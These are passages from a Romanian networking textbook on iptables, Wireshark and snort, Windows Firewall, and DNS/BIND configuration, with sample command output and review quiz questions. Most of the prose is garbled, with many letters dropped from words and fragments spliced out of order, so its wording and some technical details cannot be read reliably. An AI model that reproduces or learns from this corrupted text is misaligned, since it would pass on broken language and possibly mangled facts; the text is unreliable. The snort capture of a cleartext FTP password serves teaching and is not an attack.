si gu ă ta elă, ta elele î pă ţi d u ul sau ai ulte la ţu i. De e e plu, la ţul de OUTPUT
apa ţi e atât ta elei filter ât şi ta elei nat. La fel, la ţul de INPUT apa ţi e atât tabelei
filter ât şi ta elei mangle. Câ d u pa het aju ge la o staţie e i ple e tează o astfel de
politi ă azată pe ipta les , o t e ui luate a u ite de izii asup a a estuia, ealizâ du-se
a aliza fie ă ui la ţ e ţio at ai sus. Î figu a de ai jos se ilust ează odul î a e se a
fa e e ifi a ea fie ă ui la ţ.
INPUT OUTPUT
Internet Decizie de rutare Internet
Proces
intern
Decizia de rutare
U az spe ial al PAT îl ep ezi tă redirectarea. În acest caz se va înlocui pachetul primit
di eţeaua lo ală a â d ad esa su să “, ad esa desti aţie D, po tul P u u altul a â d ad esa
su să “, ad esa desti aţie M ad esa oute ului , po tul ‘ po tul în care se face redirectarea,
spe ifi at de utilizato . ‘edi e ta ea este î ge e al folosită pe t u a i ple e ta u proxy
t a spa e t, az î a e pe oute ul M po tul ‘ as ultă u proxy configurat pentru proxy
transparent.
fapt u ele at i uit utilita ului. T e uie spe ifi at ă u se u ă eşte niciun fel de exagerare
î afi aţia faptului ă Wireshark este o side at â a d eapta a o i ă ui ad i ist ato . Cu
ajuto ul său se poate fa e i spe ţia la i elul a te telo u ui pa het şi ai ult la i el de
stream TCP. Apli aţia se poate folosi atât î s opu i ad i ist ati e ât şi î s opu i de
troubleshooting pe t u eţea. Popula itatea a estei apli aţii este oti ată de:
U GUI i tuiti şi uşo de utilizat
Modul fa il de p eze ta e a i fo aţiei
E iste ţa u o filt e o ple e pe aza ă o a se poate izola t afi ul i te esa t
6.3.1.4 Filtre
Î afa a azului î a e se do eşte ealiza ea u ei statisti i p e u ea des isă ai sus,
foa te a a i te e i situaţia î a e se a do i aptu area întregului trafic. Motivul pentru
acest lucru este cantitatea mare de trafic neinteresant. Mai ales pe wireless, doar protocolul în
si e eează a ze e pa hete pe se u dă p i folosi ea de: beacon-uri, ack-u i şi broadcast-
uri. Pentru ca este ineficie tă pa u ge ea u ei liste de aptu ă foa te a e pe t u a ăuta
pachetele dorite, Wireshark pu e la dispoziţie două tipu i de filt e:
Filtrul de aptură: se poate aplica din meniul de Capture Options şi p esupu e o aptu ă
sele ti ă azată pe egulile filtrului
Filstrul de afişare: se apli ă peste o aptu a deja efe tuată. Este ai pute i de ăt filt ul de
aptu ă şi este folosit î p eu a u e p esii egulate a a sate pe t u a găsi u a u it tip de
pachete într-o aptu a sal ată.
Aplicarea filtrelor de aptu ă se fa e di e iul Capture Options. Se pot aplica mai multe
filt e p edefi ite u ei aptu i e u ează să fie fă ută. Filt ele de afişa e se i o ă
ase ă ăto , asup a u ei aptu i deja ealizate, din meniul Analyze > Display Filters.
224 | ‘ e ţ e l e L o a l e
6.3.2.1.1 Operatori
1. Operatorii de o parație pe a e li ajul îi ofe ă se pot folosi î u a di ele două fo e
posi ile: fo a lite ală şi fo a ate ati ă:
Modul si plu de aptu ă de pachete – în acest mod snort aptu ează t afi ul defi it a t afi
interesant
Modul de aptu ă de pachete cu jurnalizare – snort poate să sto heze aptu a într-u fişie pe
disc în diferite formate: format syslog, text, binar.
Modul IDS/IPS – în acest mod, snort permite definirea de reguli de identificare a unui tipar de
t afi şi ge e a e de ale te, i o a ea de alte p og a e, et .
[...]
09/07-18:05:34.733011 0:17:31:49:39:99 -> 0:E0:20:20:14:48 type:0x800 len:0x60
192.168.1.2:21 -> 192.168.0.254:50613 TCP TTL:64 TOS:0x0 ID:53593 IpLen:20 DgmLen:82 DF
***AP*** Seq: 0xB5B61579 Ack: 0x9751DAF7 Win: 0x5B TcpLen: 32
TCP Options (3) => NOP NOP TS: 26264774 26265674
33 33 31 20 50 61 73 73 77 6F 72 64 20 72 65 71 331 Password req
75 69 72 65 64 20 66 6F 72 20 72 6C 0D 0A uired for rl..
[...]
09/07-18:05:35.957654 0:E0:20:20:14:48 -> 0:17:31:49:39:99 type:0x800 len:0x4B
192.168.0.254:50613 -> 192.168.1.2:21 TCP TTL:63 TOS:0x10 ID:7507 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x9751DAF7 Ack: 0xB5B61597 Win: 0x5C TcpLen: 32
TCP Options (3) => NOP NOP TS: 26265797 26264774
50 41 53 53 20 72 6C 0D 0A PASS rl..
228 | ‘ e ţ e l e L o a l e
P o le a folosi ii afişă ii la ieşi ea sta da d este faptul ca snort poate captura mult mai
repede de ât poate afişa pe e a . De a eea la u t afi susţi ut, snort a î epe să sa ă
peste u ele pa hete pe t u a putea afişa i fo aţia pe monitor. De aceea, de obicei, snort se
ulează u opţiu ea -l, care permite salvarea capturii în jurnale.
Deasemenea, formatul pcap este folosit şi de apli aţii u i te faţa GUI, precum Wireshark.
De i aptu a poate fi î ă ată şi izualizată şi î od g afi .
În mod i pli it, pa oul e t al, de detalii, afişează atu i â d î stâ ga este sele tată
ădă i a firewall-ului: Windows Firewall with Advanced Security on Local Computer o listă u
trei profiluri: Domain, Public şi Private. A este p ofilu i se află î legătu ă u tipu ile de
o e iu i afişate şi de i te faţa Network and Sharing Center p eze tată î se ţiu ea 3.4.1 şi
o ţi setă i dife ite î fu ţie de is u ile pe a e dife ite tipu i de o e iu i le p ezi tă. Ele
au ele a ţă î o te tul lui Windows Firewall după u u ează:
Domain: Cal ulatoa ele e ulează Wi do s Vista sau Windows Server 2008 pot dete ta da ă
se poate ealiza apa te e ţa la u do e iu î t -o a u ită eţea la a e su t o e tate. A est
profil e esită a toate al ulatoa ele să fie e e ale u ui do e iu pe t u a putea a esa
controller-ul de domeniu.
Public: Profilul Public este folosit de ăt e firewall pentru a proteja sistemul când acesta este
o e tat la o eţea pu li ă, sp e e e plu una wireless. Practic, pentru Windows Server 2008, o
eţea pu li ă ep ezi tă o i e eţea a e u se află î i te io ul pe i et ului eţelei deli itate
de firewall-ul acesteia.
Private: P ofilul o u i ă firewall-ului odul î a e să p otejeze siste ul în momentul în care
a esta este e u al u ei o e iu i p i ate, adi ă apa ţi e u ei eţele p otejate de u
firewall hardware.
publice vor folosi profilul Public care va impune un set de reguli mai restrictive, în timp ce
o e ta ea la eţelele lo ale izolate, se u izate şi/sau aflate su p op ia ad i ist a e poate
e esita u set ai pe isi de eguli, u a fi pa taja ea fişie elo şi a i p i a telo î
eţea, eguli o figu ate î ad ul p ofilului Private.
Modificarea tipului u ei o e iu i se poate fa e a ual ai puţi pe t u tipul Domain,
a e a e e i ţe supli e ta e . Wi do s apli ă, î să, şi î od auto at a este p ofilu i î
fu ţie de tipul de t afi i spe tat pe i te faţa o e tată. Astfel ă, î azul apa te e ţei la u
do e iu, se apli ă î tâi p ofilul Domain, ajungându-se ulte io la opţiu ea de a apli a u ul
di t e elelalte două p ofilu i. Pe t u situaţia de ai sus, peste p ofilul Domain se apli ă
automat profilul Private deoa e e se o side ă ă zo a deli itată de staţiile di t -o eţea,
e e ale u ui do e iu, ep ezi tă deja o zo ă de u a u it g ad de se u itate şi
sigu a ţă. Da ă i te faţa u este aute tifi ată la u controller de domeniu (deci conexiunea sa
u este e ă a u ui do e iu atu i se apli ă auto at p ofilul Public.
Pe t u a a esa setă ile p ofilu ilo i pli ite, se poate fa e li pe link-ul Windows Firewall
Properties din panoul de detalii, la baza regiunii Overview, în care sunt listate aceste profiluri
(figura 6-3).
“e o se ă ă toate ele t ei p ofilu i se o figu ează si ila , spe ifi â du-se starea
firewall-ului şi odul de t ata e a o e iu ilo î fu ţie de se sul î a e au fost i iţiate. La
apăsa ea uto ului Customize su t dispo i ile opţiu i supli e ta e e ad esează otifi a ea
utilizatorului în momentul în care firewall-ul lo hează o apli aţie şi o po ta e tul pe is
de firewall în cazul î a e siste ul î ea ă să ăspu dă p i unicast în urma unui trafic de
broadcast sau multicast di eţea.
234 | ‘ e ţ e l e L o a l e
Afişa ea egulilo defi ite i pli it î Windows Firewall se face printr-un simplu clic pe
atego ia do ită î pa oul di stâ ga: Inbound Rules sau Outbound Rules. Deoarece lista poate
de e i destul de up i zătoa e, ai ales după defi i ea egulilo p op ii şi pe se e e u o
ultitudi e de apli aţii şi se i ii i stalate, a esteia i se pot apli a filt e di pa oul de a ţiu i1.
Apli a ea filt elo poate ad esa p ofilul de a e a estea apa ţi , sta ea lo a ti e sau u şi
g upul di a e fa pa te adi ă apli aţia sau se i iul de a e apa ţi . Filt ele pot fi apli ate
se e ţial. Pe t u şte ge ea tutu o filt elo a ti e se fa e li pe link-ul Clear all filters.
Pe t u a izualiza p op ietăţile u ei eguli i dife e t da ă este de tip inbound sau
outbound , se poate fa e du lu li pe egulă di pa oul e t al i dife e t de p eze ţa
filtrelor).
Ate ţie, u se pot odifi a toate p op ietăţile egulilo p edefi ite; î ele ai ulte
di t e azu i, e e uta ilul aso iat egulii u poate fi s hi at, la fel a şi po tu ile şi setul de
p oto oale i luse î egulă. A este est i ţii su t i puse deoa e e egulile i pli ite ad esează
fu ţio a ea se i iilo Wi do s a e foloses po tu i şi p oto oale sta da d pe t u a
comunica.
1
Este de la si e î ţeles ă filt ele afe tează doa afişa ea a u ito eguli; ele u afe tează î i iu fel
fu ţio a ea lo . Pe t u a easta se foloseşte p op ietatea E a led dispo i ilă pe t u fie a e egulă.
235 | “ e u i t a t e ş i o ito iza e
1
Pe t u a easta t e uie să e iste şi o egulă o espu zătoa e de tipul Co e tio “e u it ‘ule.
236 | ‘ e ţ e l e L o a l e
Protocols and ports: ‘egula poat fi pa ti ula izată î o ti ua e spe ifi â d po tu ile şi
p oto oalele TCP, UDP, G‘E, IP , L TP, et . e esa e pe t u o o e iu e p i a eastă egulă.
Pe t u ICMP su t dispo i ile opţiu i supli e ta e, î fu ţie de odu ile esajelo . De
ase e ea, filt a ea pe ază de po t se poate fa e atât pe t u po tu ile su să ât şi pe t u ele
desti aţie p op ii, î azul de faţă .
Scope: “u t pe ise spe ifi a ea u o ad ese IP, i te ale de ad ese IP sau hia su eţele
î t egi de la a e su t a eptate o e iu ile. A eiaşi pa a et i pot fi o figu aţi şi pe t u
aşi a lo ală, az î a e egula se a apli a tutu o o e iu ilo di t e ad esele lo ale şi
ad esele de la dista ţă a e î depli es a ele ite ii o figu ate.
Advanced: “e poate spe ifi a p ofilul pe t u a e egula este a ti ă toate sau numai unul
di t e ele t ei şi o e iu ea de eţea pe t u a e egula se apli ă.
1
Utilitar espo sa il u po i ea şi op i ea se i iilo , po i ea auto ată a lo la i iţializa ea siste ului si
oprirea lor la închiderea sa.
2
Utilita u ultiple espo sa ilităţi de se u itate, i luzâ d aute tifi a ea utilizato ilo . Ţi tă pe t u
u e oşi i uşi.
237 | “ e u i t a t e ş i o ito iza e
4. Î u ătoa ea pagi ă se sele tează etoda de aute tifi a e folosită de egulă. Opţiu ea
Default foloseşte aute tifi a ea i pli ită a p ofilului. Se mai pot selecta metode de
aute tifi a e azate pe utilizato şi al ulato eea e e esită apa te e ţă la u do e iu ,
doa î fu ţie de al ulato , sau pe aza u ui e tifi at. P i opţiu ea Advanced se pot
spe ifi a două sesiu i de aute tifi ă i, se e ţiale, fie a e p i etodele sale.
5. Pe pagina Profile se aleg p ofilu ile pe t u a e egula a fi a ti ă.
6. Î ulti a pagi ă se i t odu e u u e şi o des ie e a p ofilului.
În Windows Server 2008, setă ile e ad esează IPSec sunt incluse în Windows Firewall şi
sunt accesibile la pagina IPSec Settings di ad ul fe est ei de p op ietăţi a firewall-ului.
Modifi a ea setă ilo i pli ite su t a esi ile p i apăsa ea uto ului Customize. Acestea vor
afecta toate regulile de tip Connection Security Rule definite în firewall.
Co figu ă ile pe t u IPSec se î ad ează î t ei atego ii: s hi ul de hei key exchange),
protejarea datelor (data protection şi odalitatea de aute tifi a e authentication method).
Pentru a schim a odul î a e se ealizează s hi ul de hei, se alege optiu ea
Advanced din grupul Key Exchange şi se fa e li pe uto ul Customize.
6.4.2 Monitorizare
U aspe t i po ta t al ad i ist ă ii o i ă ei eţele îl ep ezi tă o ito iza ea se e elo
şi a t afi ului di eţea. Î Windows Server 2008, o ito iza ea pe fo a ţei se e ului este
ealizată de ăt e utilita ul Reliability and Performance Monitor. Pe de altă pa te, u alt
utilitar, Event Viewer, pe ite o ito iza ea ju alelo e ţi ute pe t u a ajuta la
ide tifi a ea p o le elo e pot apă ea î fu ţio a ea pe te e lu g a serverului.
Din cadrul Reliability and Performance Monitor, utilitarul Reliability Monitor ofe ă o
pe spe ti ă glo ală asup a e e i e telo di siste e au afe tat de-a lungul timpului
fu ţio a ea sa î t -un mod negativ.
1
U page fault ep ezi tă o situaţie î a e se a esează date di e o ia i tuală a u ui p o es da
a e u se găses î e o ia fizi ă şi t e uie aduse di fişie ul de pagi a e.
243 | “ e u i t a t e ş i o ito iza e
Cealaltă atego ie de jurnale, Application and Services Logs, păst ează i fo aţii
pa ti ula e pe t u apli aţii şi o po e te ale se e ului. A este ju ale i lud e e i e te de
tipul Hardware Events i stală i, e o i , Internet Explorer Events şi Key Management Services
(e e i e te legate de folosi ea heilo pe t u ipta ea i fo aţiile t i ise sau p i ite di
eţea .
Pe t u î t eţi e e, ju alele pot fi golite pe iodi sau sal ate î fişie e pe dis î dife ite
formate.
244 | ‘ e ţ e l e L o a l e
Î tre ări
1. Care dintre rotocoalele de mai jos permite u t a sfe sigu de fişie e?
SSH-1
TFTP
SCP
Telnet
2. Care din echipamentele de mai jos pot fi folosite pentru a contracara atacuri?
firewall-urile
IDS-urile
concentratoarele VPN
atât IDS-u ile ât şi fi e all-urile
3. Care din protocoalele de mai jos nu are nevoie de inspectare a traficului pentru a
fu ţio a p i t -un firewall?
FTP
IRC
WWW
SQL
4. De e u a e se s u ătoa ea egulă?
iptables –A INPUT --mac-source 01:01:01:01:01:01 –j REJECT
egula este i o e tă si ta ti
se primesc pachete ICMP de tip echo- e uest de la . . . / , da la o ată de pe
se u dă
se primesc pachete ICMP de tip echo-request de la 192.168.1.0/24 dar se scriu în log
doa pe se u dă
nu se primesc pachete ICMP de tip echo- e uest de la . . . / şi se s iu în log
doa pe se u dă
7 DNS
You k o it’s lo e he ou e o ize he IP add ess to skip DN“ o e head
Cine este...
Paul Mockapetris este inventatorul DNS. Mockapetris a lucrat ca manager de program
la di e se o pa ii de eţelisti ă și I te et. Di , a ti ează la I stitutul de Știi ţe
Informatice (ISI) de la Universitatea din California de Sud.
Paul Vixie este auto ul u ui u ă i po ta t de RFC-u i și utilita e sta da d UNIX. A
fost eato ul se e ului DN“ i d și a hite tul a estuia pâ ă la e siu ea . Ope ează
se e ul ădă i ă L di DN“.
ro … net com
pub …
roedu netacad
cs acs
an, iar un subdomeniu .ro ostă e a ai ult de 0 USD + TVA (19%), dar este înregistrat pe
iaţă. De la ia ua ie , pe soa ele fizi e şi ju idi e di ‘o a ia pot t i ite e e i pe t u
înregistrarea de domenii .eu. Pot i it EU‘id Eu opea ‘egist fo I te et Do ai s , pâ ă la
data de 20 septembrie 2007, România „a contribuit" cu 11,851 de nume de domenii .eu
a ti e. Co pa ati , lo uito ii Ge a iei deţi 822,712 de domenii .eu, iar cei ai Republicii
Cehe deţi , de do e ii.
După u s-a p e izat ai sus, p oto olul DN“ ofe ă şi posi ilitatea de reverse-lookup.
A eastă fa ilitate este folosită de utilita e de troubleshooting precum traceroute sau
ping.Pe t u a păst a o o siste ţă î fu ţio a e, şi t adu e ea i e să se fa e tot u ajuto ul
u ui do e iu, a e poa tă u ele de in-addr.arpa. El nu este un top-level domain şi a fost
eat pe t u a pe ite ezol a e i e să, di ad ese IP î u e.
A esta o ţi e su do e ii a e o espu d u o teţii di t -o ad esă IP, î o di e i e să.
De exemplu, pentru adresa 141.85.37.1, cererea pentru traducerea i e să se a fa e pe t u
1.37.85.141.in-addr.arpa. Î aza de date DN“ a estei i t ă i îi o espu de u ele staţiei.
PTR ide tifi ă î egist ări de tip pointer şi su t folosite pe t u ezol a ea i e să. A estea
aso iază hei de tip adresa IP de genul 1.37.85.141.in-addr.arpa cu un nume de domeniu
complet.
user@orange:~$ host -t PTR 1.37.85.141.in-addr.arpa
1.37.85.141.in-addr.arpa domain name pointer csr.cs.pub.ro.
MX ide tifi ă î egist ă i de tip server de mail şi su t folosite pentru a indica numele serverelor
de mail responsabile pentru mailurile destinate domeniului specificat în cheie. Adresa
se e elo de ail se spe ifi ă u ajuto ul u o î egist ă i de tip ad esă.
user@orange:~$ host -t MX cs.pub.ro
cs.pub.ro mail is handled by 5 mail.cs.pub.ro.
SOA ide tifi ă î egist ă i de tip start of authority e spe ifi ă di e şi parametri pentru
domeniul indicat în cheie: seria bazei de date, intervalul de timp la care serverul slave e ifi ă
seria, adresa de mail a administratorului de domeniu, etc.
user@orange:~$ host -t SOA cs.pub.ro
cs.pub.ro has SOA record ns.cs.pub.ro. admin.cs.pub.ro. 2007072101 28800 7200 604800
86400
TXT ide tifi ă o î egist a e de tip descriere. A easta aso iază u ele de staţie indicat de
cheie cu un text de descriere ASCII.
user@orange:~$ host -t TXT cs.pub.ro
cs.pub.ro descriptive text "UPB, Computer Science Departament"
CNAME ide tifi ă o î egist a e de tip alias. Un alias este un nume de domeniu alternativ
pentru numele specificat în cheie. Aliasul a fi aso iat u a eeaşi ad esă u a e este aso iată şi
cheia. De exemplu, considerând aliasul mail.cs.pub.ro la numele prof.cs.pub.ro, şi
presupuând ă ad esa prof.cs.pub.ro este 141.85.37.3, atunci adresa
mail.cs.pub.ro va fi 141.85.37.3.
user@orange:~$ host -t CNAME mail.google.com
mail.google.com is an alias for googlemail.l.google.com.
253 | D N S
În cazul în care sunt configurate mai multe servere DNS, se va interoga întotdeauna
p i ul. Celelalte se e e se i te oghează doa da ă se e ul i te ogat a te io u ăspu de.
include "/etc/bind/named.conf.local";
o www.politehnica.ro – 142.100.111.80
o ftp.politehnica.ro – 142.100.111.21
mail.politehnica.ro – 142.100.111.25
o
se e ul a ofe i posi ilitatea de ezol a e i e să di ad ese IP î nume
Ope aţia de a ea o zo ă pe t u a e se e ul de u e să fie auto ita , o stă di paşi:
Definirea zonei î fişie ul /etc/bind/named.conf.local sau î fişie ul p i ipal de
configurare.
Introducerea parametrilor zonei şi ezol ă ile pe t u dife ite adrese, într-un fişier de zo ă
fişie de o figu a e pe t u espe ti a zo ă .
7.2.3.5.2 Fişiere de zo ă
După u se o se ă di si ta a fişie ului p i ipal de o figu aţie, fie a e do e iu sau
zo ă a e aso iat u fişie de o figu aţie. A esta o ţi e p a ti aza de date DNS pentru
do e iu. Fişie ul o ţi e ai ulte î egist ă i DN“, fie a e î egist a e fii d des isă pe u
si gu â d. E epţie fa î egist ă ile de tip SOA a e se î heie odată u a a te ul „)”.
258 | ‘ e ţ e l e L o a l e
Î egist ă ile su t st u tu ate la â dul lo î â pu i sepa ate de spaţii sau ta -uri. Formal,
st u tu a fişie elo de zo ă este u ătoa ea:
$INCLUDE fişier nume_domeniu //
$ORIGIN nume_domeniu // parametrii de zonă
$TTL ttl //
Parametrul $ORIGIN va avea ca efect concatenarea domeniului ro. Tuturor domeniilor din
fişie e u se te i ă u a a te ul . (punct). Spre exemplu numele ns.politehnica se va
transfo a după pa sa e î ns.politehnica.ro.
Di pu t de ede e fu ţio al, fişie ul de o figu a e de ai sus s-ar traduce astfel:
Domeniul peste care serverul este autoritar este politehnica.ro î fişier este completat
doar cuvântul politehnica, î să a estuia îi este concatenat parametrul $ORIGIN )
Clasa tutu o î egist ă ilo este IN. A easta este lasa folosită peste tot î I te et.
Introducerea ei este opţio ală.
Domeniul politehnica.ro a e î egist ă i
o SOA – acest tip de înregistrare are o sintaxa dife ită de ea sta da d şi a di dis utată ai jos.
o TXT – î egist a ea TXT ofe ă u o e ta iu legat de so ietatea e deţi e do e iul
o NS – a eastă î egist a e p e izează se e ul de u e a e a ăspu de la e e ile pe t u a est
domeniu: ns.politehnica.ro (.ro este concatenat de la parametrul $ORIGIN)
o MX - înregistrarea de tip MX a e u fo at spe ial: o p io itate şi apoi ad esa se e ului. P io itatea
defi eşte o di ea î a e u lie t a î e a să o ta teze se e ele de ail ale do e iului; se a
încerca mai întâi conectarea la serverele cu prioritate ai i ă.
259 | D N S
politehnica.ro
waters@myr:/etc/bind# named-checkconf
waters@myr:/etc/bind# named-checkzone politehnica.ro. /etc/bind/db.politehnica.ro
zone politehnica.ro/IN: loaded serial 2007092001
OK
waters@myr:/etc/bind# named-checkzone 111.100.142.in-addr.arpa
/etc/bind/db.111.100.142.in-addr.arpa
zone 111.100.142.in-addr.arpa/IN: loaded serial 2007092001
OK
2. “i olul „@
E istă ulte e e ple de o figu aţii BIND pe I te et. Multe di a estea o ţi î fişie ul
de zo a si olul „@ . “i olul a esta este e hi ale t u a gu e tul di e ti ei $ORIGIN. În
e e plul de ai jos, a s ie „politeh i a. o. sau a s ie „@ a a ea a elaşi efe t. De i u alt
od de a s ie fişie ul db.politehnica.ro este u ăto ul:
$ORIGIN politehnica.ro.
$TTL 36000
@ IN SOA ns.politehnica.ro. admin.politehnica.ro. (
2007092001 ; Serial
8H ; Refresh
2H ; Retry
1W ; Expire
1D ; Negative TTL
)
TXT "Universitatea Plitehnica Bucuresti"
NS ns
MX 10 mail
A 142.100.111.53
ns IN A 142.100.111.53
mail IN A 142.100.111.25
www IN A 142.100.111.80
ftp IN A 142.100.111.21
1
http://www.ietf.org/rfc/rfc1912.txt
263 | D N S
ns IN A 142.100.111.53
mail IN A 142.100.111.25
www IN A 142.100.111.80
ftp IN A 142.100.111.21
Aliases:
“e o se ă
si ila itatea foa te ae a o figu aţiei fişie ului de zo ă
db.cs.politehnica.ro u fişie ul db.politehnica.ro. E epţiile o stau î u ele de
do e iu şi ad esele IP.
1
pa u ge e se e ţială a u ei liste circulare
266 | ‘ e ţ e l e L o a l e
O se aţii:
tipul serverului este setat ca master
267 | D N S
directiva notify: atu i â d a eastă di e ti ă este folosită şi setata la aloa ea yes, la fiecare
s hi a e a fişie ului de zo ă se o t i ite esaje spe iale de NOTIFY tuturor serverelor slave
a e su t spe ifi a e î fişie ul de zo ă p i î egist a ea NS adi ă se e ele de u e u
î egist ă i NS, în afara de cel master care este specificat în SOA).
directiva allow-transfer: pe ite t a sfe ul doa ăt e se e ul slave cu IP-ul spe ifi at. Da ă
a easta di e ti ă a lipsi, o i e se e a putea să des a e o figu aţiile de zo ă de la master.
directiva also-notify: este folosită pe t u a otifi a şi alte se e e, a e se află de o i ei ai sus
î ie a hia DN“, de s hi a ea u ui fişie de zo ă. Este t i is tot u esaj de tip NOTIFY,
odată u esajele t i ise şi se e elo slave.
ele opţiu i specificate prin directivele de mai sus se vor aplica doar zonei
politehnica.ro! Da ă a estea a fi fost i t oduse î named.conf.options sub directiva
glo ală options, acestea s-ar fi aplicat global.
I t a ea de zo ă di fişie ul de o figu a e al se e ului sla e a a ăta astfel:
zone "politehnica.ro" {
type slave;
file "/etc/bind/db_slave.politehnica.ro.txt";
masters { 142.100.111.53; };
allow-notify { 142.100.111.53; };
};
O se aţii:
tipul serverului de nume este slave
directiva masters: i di ă slave-ului IP-ul serverului master de la a e să îşi des a e o figu aţia
directiva allow-notify: spe ifi ă se e ele master de la care acest slave a eptă otifi ă i
1
NetBIO“ peste TCP/IP ai este p es u tat şi NBT.
268 | ‘ e ţ e l e L o a l e
7-8: A tualizări di a i e
Root hints: Lista de servere ce sunt contactate pentru zonele ce nu sunt configurate local în
se e ul DN“, î azul î a e u e istă se e e de forwarding sau a estea u ăspu d.
Debug logging: Pe t u a sup a eghea fu ţio a ea se e ului, pot fi î egist ate î t -u fişie
i fo aţii desp e pa hetele a e i ulă p i se e ul DN“. “e poate sele ta di e ţia i t a e,
ieşi e , p oto olul folosit TCP, UDP şi e tipu i de pa hete o fi otate. De ase e ea, se
poate aplica un filtru pentru a selecta pachetele în fu ţie de ad esa IP de la a e soses sau
spre care sunt destinate (Figura 7-11).
Event logging: “e e ul DN“ poate e ţio a î ju ale dife itele e e i e te e apa î
de u sul ulă ii sale, a e o i şi a e tis e te. Aici se poate configura care dintre acestea vor
apă ea î ju ale.
Monitoring: Ai i pot fi efe tuate o se ie de teste asup a fu ţio ă ii se e ului, folosi d e e i
recursive sau nerecursive. Se pot efectua teste imediate sau la intervale regulate, iar
rezultatele lor sunt evaluate.
1
Round- o i a ti at di p op ietăţile se e ului se fa e la i el de se e şi u la i el de zo ă.
272 | ‘ e ţ e l e L o a l e
MX (mail exchanger): Î egist ează ide titatea se e ului sau se e elor) de e-mail pentru o
a u ită zo ă sau do e iu. Ele di e ţio ează toate al ulatoa ele e do es să t i ită esaje
e- ail sp e u a u it do e iu sp e u a u it se e desti at p i i ii lo . Î fişie ele de
o figu a e, i t ă ile MX su t ide tifi ate p i t -u u ă de p efe i ţă. Nu e ele ai i i
ofe ă o p io itate ai a e. E e ple de i t ă i MX su t u ătoa ele:
@ MX 10 mail.storage.com
@ MX 100 queue.storage.com
SOA (start of authority): Cuprinde serverele de nume primare ce sunt autoritare pentru o
a u ită zo ă, p e u şi o i fo aţie de o ta t pe t u ad i ist ato ul espe ti ei zo e. De
ase e ea, sta ileşte pe ioada de ti p pe t u a e u se e eauto ita poate păst a
i fo aţiile p i ite î ai te de a le e ifi a di ou la serverul autoritar. Un exemplu de intrare
“OA este u ăto ul:
@ IN SOA ns.storage.com. admin.storage.com. (
200808272000; serial number – timestamp al ultimei modificări
100; refresh
50; retry
86400 ; expire
3600 ) ; default TTL – validitatea informaţiilor de la serverul autoritar
275 | D N S
O i t a e “OA este auto at eată la i stala ea se e ului DN“, u alo i i pli ite pe t u
aşi a lo ală.
PTR (pointer): ‘ealizează fu ţia opusă u ei i t ă i de tip A. U e e plu poate fi u ăto ul:
61.130.98.66.in-addr.arpa. IN PTR site3.storage.com
adesea sau doa u o se ie de se e e ale ă o ad ese pot fi i t oduse î lista de ai sus fig
7-20).
Tot de ai i poate fi o figu ată şi opţiu e de otifi a e a alto se e e î u a s hi ă ilo
efectuate într-o zo ă. Pot fi o ta tate doa se e ele di lista Name Servers sau efectiv cele
introduse manual în lista din fereastra Notify (figura 7-21):
7.5.2 Ipconfig
Câte a di t e fu ţiile utilita ului ipconfig, folosit î p i ipal pe t u TCP/IP ad esează şi
o figu aţia DN“ a siste ului local:
ipconfig /displaydns
Co a da de ai sus afişează î egist ă ile î cache-ul local DNS (practic, numele deja
ezol ate şi a e u au e pi at î ă şi este utilă pe t u depista ea e o ilo de ezol a e pe t u
a u ite u e. Î fu ţie de siste ul de ope a e, fie a e u e a ă ui ezol a e a fost
efe tuată u su es este eţi ut o pe ioadă de ăt e siste ul de ope a e pe t u a u ai
e esita o ouă o ta ta e a se e ului DN“ pe t u o e e tuală ouă e e e.
ipconfig /flushdns
7.5.3 Dnscmd
Utilitarul dnscmd ep ezi tă a ia ta î li ie de o a dă a i te feţei de ad i ist a e a
serverului DNS din Windows Server 2008. El pe ite ad i ist ato ilo să eeze zo e, să
odifi e î egist ă i şi să efe tueze o se ie de a ţiu i ad i ist ative asupra serverului DNS.
Pe t u a e u e a pa a et ii o e zii şi efe tele lo , se poate i t odu e o a da1:
dnscmd /?
Pe t u o op i e şi o epo i e apidă a u ui a u it se e :
dnscmd s6.marketing.local /restart
1
O listă ai up i zătoa e a pa a et ilo supo taţi de d s d poate fi a esată la ad esa:
http://www.minasi.com/newsletters/nws0803a.htm
2
:: este otaţia ad esei IP pe t u lo alhost, e hi ale tul lui . . . î IP .
280 | ‘ e ţ e l e L o a l e
7.5.4 Nslookup
Utilitarul nslookup este printre cele mai utile şi uşo de utilizat etode de testa e a
fu ţio alităţii u ui se e DN“. Fu ţia lui de ază este, p a ti , ea de ezol a e a u ei e e i
folosind serverul DNS declarat implicit în Windows.
Pentru o simpla interogare de tip A (host) se introduce comanda nslookup u ată de
numele de rezolvat:
C:\Users\Administrator>nslookup cs.pub.ro
Server: dns-cache-3.rcs-rds.ro
Address: 82.76.253.115
Non-authoritative answer:
Name: cs.pub.ro
Address: 141.85.37.5
nslookup supo tă şi alte tipu i de i te ogă i, precum MX sau SOA. Pentru a emite astfel de
i te ogă i, se i t odu e o a da nslookup fă ă pa a et i, se spe ifi ă tipul de i te oga e
dorit prin comanda set query si apoi se introduce numele de rezolvat, ca în exemplul
u ăto pe t u a ieşi di prompt-ul nslookup se pot da comenzile exit, quit sau CTRL-C):
C:\Users\Administrator>nslookup
Default Server: dns-cache-3.rcs-rds.ro
Address: 82.76.253.115
> set query=mx
> cs.pub.ro
Server: dns-cache-3.rcs-rds.ro
Address: 82.76.253.115
Non-authoritative answer:
cs.pub.ro MX preference = 5, mail exchanger = mail.cs.pub.ro
> set query=soa
> cs.pub.ro
Server: dns-cache-3.rcs-rds.ro
Address: 82.76.253.115
Non-authoritative answer:
cs.pub.ro
primary name server = ns.cs.pub.ro
responsible mail addr = admin.cs.pub.ro
serial = 2008041301
refresh = 28800 (8 hours)
retry = 7200 (2 hours)
expire = 604800 (7 days)
default TTL = 86400 (1 day)
281 | D N S
Î tre ări
1. Ca e di afi aţiile de ai jos su t ade ă ate? alegeţi toate a ia tele a e se
potrivesc)
DN“ este o ază de date dist i uită
DN“ este o ază de date e t alizată
administrarea bazei de date DNS se face centralizat
administrarea bazei de date DNS se face distribuit
5. U lie t DN“ t i ite se e ului DN“ e e i ... ... ... ... şi p i eşte ăspu su i ... ... ...
... alegeţi toate a ia tele a e se pot i es
nerecursive, autoritare
nerecursive, neautoritare
recursive, autoritare
recursive, neautoritare
8 E-mail
Dia o ds a e fo e e . E-mail o es lose.
June Kronholz
Cine este...
Eric Paul Allman este creatorul programului se d ail și al p e u so ului a estuia
u it deli e ail. “e d ail a de e it o pa te i po ta tă a dist i uţiei de soft a e de la
Be kle B“D și este î o ti ua e el ai utilizat MTA î siste ele U i . Î a fo tat
Sendmail Inc. pentru a lucra la î u ătăţi ea se d ail.
